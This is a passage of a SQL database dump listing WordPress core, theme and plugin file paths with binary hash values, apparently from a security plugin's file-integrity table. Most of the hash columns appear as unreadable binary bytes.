@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&E�zݜ�Z�y׺ڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����A�<_\r^،','-өw�r��\n�ϸ�`�g-7�����.�c�?�','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#D�\"5.�(���5��','Pe�Z\nG=�<����B3��\n\r٘�<��ׅ��','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN	�','',0,'?'),('y\\�.yW��K>��+','wp-content/themes/magazine-hoot/include/admin/images/1-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�u����2�4�H�;','4��Os�8hTI���:��Q#jc��\"���n�','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('y�&�eW�K6�]��H�','wp-content/plugins/wp-cerber/assets/flags/br.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ն=Xo�#','�l�YC��#�fݽ�\Z\'4��	fk>�χO��}','',0,'?'),('y�5�7!�g��� 	','wp-content/themes/twentynineteen/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uܥ�֭�=�\\�M��U�','��0]L\0��W����=œ,�[��}|����\\�','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�s7S`�G���UI�','�i�\"ă�;]���HY��;z�,n����P^Z[\'J�','',0,'?'),('y�\"�jY\0u���<c','wp-content/plugins/wp-cerber/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�c$Koʛd\\\ni�7�','���h�\"��y��K\'� <�v�mZ9Qg�','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ss#V����͓h�C�','XDx�ޭ7豽Hs�E��k]����\Z���i\'��','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']3��mi䙶�&�','�����U�?6RA鲣�����R�)b�n8�','',0,'?'),('z@���z�[P�ѐ�','wp-content/plugins/wp-cerber/assets/flags/rw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Ľ�C��6���ޯ�L�','y\n<P�^5z��g�\\\"�f\\�S�p8��1s','',0,'?'),('z]��Őx�\'!*[,��','wp-content/plugins/wp-cerber/assets/flags/ar.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IauKc� ���io1','R�2�$��͗�[��G`�d�;TC\0ԙ���U','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q>�<�H[AYܝ\n���','��{p2�J�+-��%�.�G#�rpE�]>���','',0,'?'),('zuWs�~=T�����X','wp-content/themes/magazine-hoot/template-parts/footer-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�;�G�j����','U@�Š����!/q~L�:�/M$�n��q��','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5	g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���l&��\0G�c',',��	�ۗ*u�K\\����A����������wD�','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('z΋ۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('{����֘莃���','wp-content/themes/magazine-hoot/include/admin/widget-parts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�5,���F�^�i��(8',')������!G�}��{+)�3��~��?oB�jDֆ','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��P�N��P�','H+T9���h�m�)L���(��u�Z^dH�','',0,'?'),('{��=2���?l�����','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pg���!��/�՝','�,	X6�!צ6�H�%�=98�`�y��nj�-','',0,'?'),('{N���2�Q�u��=	�','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��b~�@�u�ˏJ��','��\Z��dc\\fu�5���=q�אEc���I�a�','',0,'?'),('{=ا�{��\no}]v�','wp-content/plugins/wp-cerber/assets/flags/sa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]pڌE�YYz�ٶ','�����0��{A�3�HX�~��z��\nT�','',0,'?'),('{F��{��1(�L;S6','wp-content/themes/magazine-hoot/hybrid/extend/customize/assets/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qA��J���=��','=*�e�����j ���@�m�p�M)��i	l','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���X�\'��]2�!','����~�X\0I��8�w,��NÃ�}v7��C','',0,'?'),('{o��/�o�h9�a��','wp-content/plugins/wp-cerber/assets/flags/ve.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g���^ٔwX�c�','Z��\\[.�M���q��2]l�AL��Jf���C','',0,'?'),('{t�E~��P�A�1��','wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P9�6�Z3\'2���>','�v�t&�����h3�C���9)�L��9Ub�Ki','',0,'?'),('{y\"�ҵ��ݩ�{���','wp-admin/includes/class-walker-category-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǯ ��f/,d%eU�','�Q��;����\Z�4o_�{����\nϠ�q\"Q�r','',0,'?'),('{�j�ɏ|n�	^<�WH�','wp-includes/css/dist/nux/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n����n��L�6\r�k','Q9��1�9�ĵ��j1���g�9�\"*h+ۥ-n','',0,'?'),('{�)�4e4p:�fW�','wp-includes/js/jquery/jquery.query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('{�4�O;{\'$2dț�O','wp-content/themes/twentytwenty/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y)G�.�\'','5H?%��)�JzI<Y�6�WJ2�I���d�','',0,'?'),('{�1�9�+sh���','wp-content/plugins/wp-cerber/assets/flags/gp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CG_t?���9�rK','��hd0)m�3�a�ͱQ�D�V�����}�','',0,'?'),('{�RC��\Z�.*\"�Q','wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z2�j��(=iSM�IV�','\Z�/������\'\\��.��	7�����3','',0,'?'),('{�\r�-��}�^��','wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('{���?���\r��\n\'','wp-admin/images/imgedit-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\\2���}�G�i;O','T�N�~��-�@��N��̞V�\\��(u$��','',0,'?'),('|j��x7�(Q}�0�\'�','wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����~FՕ��','H,=�!B�=�?��Op`K˄�`�^�y!���','',0,'?'),('|\rl?D_�m�d� Y�x','wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&D�_F#�I!���','�R��g����[>{��e�\n�ژx�1��R�','',0,'?'),('|-����z��-�','wp-admin/export-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xh�v�iy��.��','C~S����|��8R�wK@�_�J��m�','',0,'?'),('|/ڒ�\0[*4��x��','wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('|;IYZ�^�i����','wp-content/themes/magazine-hoot/hybrid/inc/functions-templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٶ��DhƩ�~��2K','·vvD���3�;&����5�(ـs���҃� ��','',0,'?'),('|N!�;x�N&�g��m�','wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G9�Fm�qQ��','J�6�%V��\"�\rK�yɳ�h���8�N�����F','',0,'?'),('|l�+F��#ڟ�����','wp-includes/class-wp-user-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�?�v��\\����$','z����.t(���C�o���	���tV�','',0,'?'),('|�� �4�x�\\��M�n','wp-admin/js/code-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D&fAД��E��~','{���h;[�5��0`	Vz��Kd�����^,h�','',0,'?'),('|����f�lG��P�.','wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"W:]��`A\"e�:�Ս','�&�?�~����ur��4�Ў�[����z^','',0,'?'),('|��T]��:Y$=\'h�','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��Gy�d�7?��_�','�3�7!��|�����%�e��k�6XL','',0,'?'),('|��Y�>��	�Ɔ�','wp-admin/link-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�!\'ljP��^kI��','�5:���q��φR_\\y���h�\rLIl���','',0,'?'),('}ĉ=�t�����','wp-includes/images/toggle-arrow-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('}L;��],����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,(�[�\0�b��۪��z','�)�Y|\nA0a���\r�%in���ߞkMjC\'��','',0,'?'),('}O� !ٶ]�O�O[�','wp-includes/block-supports/typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�΁�veY�\Z��f�','�B��tٯ�@�^���5��N���XȆ<','',0,'?'),('}\\�5�\r��$�l�W���','wp-admin/js/tags-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��D��B�aB�*','$Y�Xx��93%��ftC0y�,�^���\n','',0,'?'),('}`��g\"P�2��V��','wp-includes/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('}�|F/��ӽ=�[F�','wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�O�}1X\0�\Z�5�\0','��F:��C4��1M>)��	5}sp����m�d�','',0,'?'),('}�7 ޘ�DHD�Pl','wp-includes/SimplePie/Registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\���S8�X�`Yt','5\n֚�8��q�W��@��C�HҘ���\\eg','',0,'?'),('}�HJ�1�%�`��','wp-content/themes/twentytwenty/template-parts/modal-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#g��:�N6Ȱ\\qW','��	^+z:%,��1z�(�\Z�\'|��T�9��J','',0,'?'),('}�l}%CK�c}�NH��\Z','wp-content/plugins/wp-cerber/assets/flags/gr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\0�$��*0B�֏*�','����,DZ��W?������l�G��k��Qq','',0,'?'),('}�Ȑ�\\L��`���i)','wp-includes/ID3/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GؐV%�P_��շ�','�I>��a�*R8?�)�p1�U͔�?2�=o��','',0,'?'),('}����=\"$�x���','wp-content/plugins/wp-cerber/assets/flags/si.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E����z|9�','��ո�����	+���}x͐�侟�?#���','',0,'?'),('}���{RҢ���\"','wp-includes/default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('~Ⱦ/�m�ր�!��','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e4�/����','p�f*�p�m$�F���tw��F��x?�.','',0,'?'),('~��\\��_b�$�-��!','wp-includes/js/jquery/ui/selectable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('~ A�@�[�����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�@�C�U�h�R~\\:','�^\Z�g�(�p(\n��!\"�ͭBy�E\"3;σ�','',0,'?'),('~2\"�3����I�|!�','wp-content/themes/magazine-hoot/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���SE�\"�5G���','oa�};�} H�������(_hY��-���\Ze','',0,'?'),('~?�J�I�b*׺�e�C','wp-admin/images/resize.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN������','�6󀏸��&?�5��?s�qGM`P;','',0,'?'),('~A�H�g��KT��','wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:��R�K�ro�H2z','9yԆ&/AX�H�i{b���7f���rw���=m','',0,'?'),('~F��㫎>dy��j�','wp-includes/css/jquery-ui-dialog-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('~V��Xa]�7p�|R','wp-includes/class-wp-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('~i�I�;ݭ]�A��S','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54��⓿�`�����','D��Oo;o�O]+�\0���5�]/\"�޸&�Q�','',0,'?'),('~q�IP�I���r��','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-\\�d��oG��\n��2','Sa)����ʗn&B��V�~��11�\'w�(','',0,'?'),('~}�{ ��>D�}�<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3�;�7��v:�P���','JlA��Z��q��F�v�<3�I^��k�','',0,'?'),('~��ReOX�f2��`�','wp-includes/class-wp-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('~��`�Wj��|iLI=��','wp-content/themes/twentynineteen/sass/site/primary/_archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�jq�@�hD�)��r','�h����o3U� 	��~���n6��>i~�M#','',0,'?'),('~ť�s\0�1y�$�L}h','wp-config-sample.php',0,'�S�Ӌ���h��1����','�S�Ӌ���h��1����','ꐐd`�4��	�\\X��L�u��$dž��Ũdb','',0,'?'),('~�Ӹbc��\Z$�@$��*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*������mI','E��\0�.�����¿¯�1F�(Df�u�v��˔','',0,'?'),('~��^��%���A�','wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8@I�z}��g��','�w][�fv\\mS����^�F\rsd���~�\'��','',0,'?'),('~�����R�I��]a','wp-content/themes/magazine-hoot/hybrid/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D;��,�l|A� �k','ʂ��,�g��df�e[_�e��۹�}@�98\\\0n','',0,'?'),('�ldK�м����','wp-includes/js/dist/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�^�}!��〼����','Ƽy�e�s�<���z�E�,_:�<E�	=�+�.','',0,'?'),(')��	�j�\'���','wp-content/themes/magazine-hoot/hybrid/contributing.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�M�7r����#�VuC','���^����o��ۻ	}�ѯ��\0!17.`�:','',0,'?'),('0u�R��D��{�1�','wp-content/plugins/wp-cerber/assets/flags/cg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��K����*�A4�@T$','��Ŕ���wEi�av�A}z�[ɵ�7�6C','',0,'?'),('6\0�O�kvzfTN','wp-includes/js/jquery/ui/effect-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}:h�B�կ}z�x�','�����񀨯n�\r�S�/<���b���ե]Na�','',0,'?'),('@�={&����}�_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}=���v�!ʸ�M','6iV��a#^n�gv�}]����@\"�ǥ{','',0,'?'),('j&��^���b����','wp-includes/ms-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('j^��SN�-O� �','wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���{9���YV?\'7�','���f�4qS�� \\���\'��~v���\Z�h�','',0,'?'),('j���)Vk��9���','wp-content/themes/twentytwentyone/assets/js/customize-helpers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�7$I��t�','�-<ݵ~���(�H�6lPLn�M�By����','',0,'?'),('tS�\"��lZ�c��Q','wp-admin/js/auth-app.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qi����~[�|\r�S','A�|f��K�\Z���F|���eɠL�e��ܬ�49','',0,'?'),('w�R1�[��P�B���z','wp-content/plugins/wp-cerber/assets/flags/rs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H]��el_L�S','9qp���p~##�7b���o����/�j|�bLl�','',0,'?'),('w�\'�Pe��F�+��V\0','wp-includes/Requests/Proxy/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/2��������)','J�6d��A��l{��Й\0������J��h','',0,'?'),('�m{8���]�ך��<','wp-content/plugins/wp-cerber/assets/flags/de.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����NJ&z\\ҿ~��i','�Ū3�J��:2;��;�����p�J�kL~�','',0,'?'),('��%G]f�@�%�Z��','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c��D��Ã��۬','Z�J��wsh5�M�����Eu/jg�[���-�','',0,'?'),('�9?�-N5bN��[��','wp-content/themes/magazine-hoot/hybrid/inc/template-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�۵���@�h���)f','�����qw”��|���E9�(���TE\r�g�','',0,'?'),('�СqD֚?�i�X','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��!(�i.+�)Қ�\"{','�Z�Q[���Q���G����7��؍E\"�','',0,'?'),('�K�Q�}U&;&���Q','wp-includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6y��w���N�ш','���W!�\Zس-�Y��}����M��W�e?','',0,'?'),('�tr�εF_� ���','wp-includes/js/wp-emoji-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hn�1e��胖��S�','�,H���w�0�����N<��l�\n�����!��','',0,'?'),('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|DZ(���r��q֧#','�)0������+���^h��v.(��>����','',0,'?'),('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AU�L�Y����M��','�)�RfZ�����~u3����}\'�?�!>','',0,'?'),('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L������k�H1��v','���F��%w+7����k	�%���W��1Z�`!p','',0,'?'),('�K��H\r�PP�\r��3�','wp-content/themes/magazine-hoot/hybrid/extend/customize/control-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O1#�^xI�*�','��)���On#��*R��!B�/j���','',0,'?'),('��ah�#��8�c���','wp-includes/js/tinymce/themes/inlite/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('��,X\Z*W����.�','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/6_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�#�ݹ���dP\r�','?�����O��5��uaM���qr0�+\n�A�N','',0,'?'),('��}��D|����	=','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�(�]�E�����','\Z���KI-A�\ZC~#u@�����j������','',0,'?'),('���r=����c���Mz','wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Y��5n��Y�2-�','��Q�f�1��)ۡV�G�y�8�V�d���%','',0,'?'),('��ں�u���M���[\r','wp-admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('��Nx��ډ\Z�8yH\\�','wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��[��Q�<�u�)','�s�0�r:l�\\����jަ���-�	�+#�ɣ','',0,'?'),('��sSk�i�<4\'c�-6','wp-includes/js/wp-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�N�O8L^�sWkJ�<','�� �E��>�@_�0���!�B����5','',0,'?'),('���e��97�aJS','wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('�\r�0m�\Z�;t��b�','wp-content/themes/magazine-hoot/include/admin/images/sidebar-wide-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']/��o%���H1�4��h','��o�^.v	�GB5B�!�4 G�e��K��S','',0,'?'),('��XQ���d9r�ڼ��','wp-includes/customize/class-wp-customize-themes-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��vl��3��','�,V���3R�w���.���\r׭+4ݦ`=�`R','',0,'?'),('�45���� -�rS�','wp-content/plugins/wp-cerber/assets/flags/kz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�OC��tЛ>��i3','>ū�[h@H�X���X���Ո�k����55gD�D','',0,'?'),('�el�5�s��E�úQ�','wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5�.��4�ԝ�Ξ','�����ڦ\'�D�\Z�� v��0��E~��b�','',0,'?'),('�n���T<�#��','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�z�\n\n�1#���','��J��T�����P��1���qVbU5�','',0,'?'),('��,CUU����9i-','wp-includes/css/wp-auth-check.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('��i�\Z!�[�8$\"�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('������J>Uv�0�','wp-content/plugins/wp-cerber/assets/flags/kp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ze�+j�U+���]','���ĀN��ɳ���2�.�@+-���YzI','',0,'?'),('��o>�V��_�r��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����m��v�=l!�','��%B\0/��\"k\0�H���>\0�T!s��]�ݷ�','',0,'?'),('���~\"3�f��Bc��D','wp-content/plugins/wp-cerber/assets/flags/mm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CNU�����2t�J','�$�5AK�`�?w{�\'��5��0��2?II`','',0,'?'),('�ȉV?	��]�)A','wp-includes/js/media-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t	���V\\E�P�[�','��,���C �A�ERo=4=^��������|','',0,'?'),('��`h�NkO�N8��','wp-includes/blocks/file/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��E��T	�